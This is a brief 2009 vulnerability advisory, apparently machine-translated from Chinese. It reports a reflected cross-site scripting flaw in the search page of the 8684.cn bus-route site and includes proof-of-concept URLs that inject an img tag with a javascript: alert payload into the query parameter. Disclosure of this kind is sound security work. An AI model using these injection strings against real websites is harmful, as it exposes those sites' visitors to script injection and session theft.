8 6 8 4. CN bus query mesh search page leading to cross-site vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200923885
Type myhack58
Reporter 佚名
Modified 2009-07-15T00:00:00


Author: Nobug32

Starters: Tosec. CN

Affected versions: Only 8 6 8 4. CN similar bus program

Description: Program when the query has not been strictly over, a direct result of cross-site vulnerability of the produce Attack test code http://beijing.8684.cn/so.php?k=pp&q=test"><img%20src=javascript:alert(/xss/)%2 0/a><" Test attack site http://beijing.8684.cn/so.php?k=pp&q=test"><img%20src=javascript:alert(/www.tosec.cn/)%2 0/a><"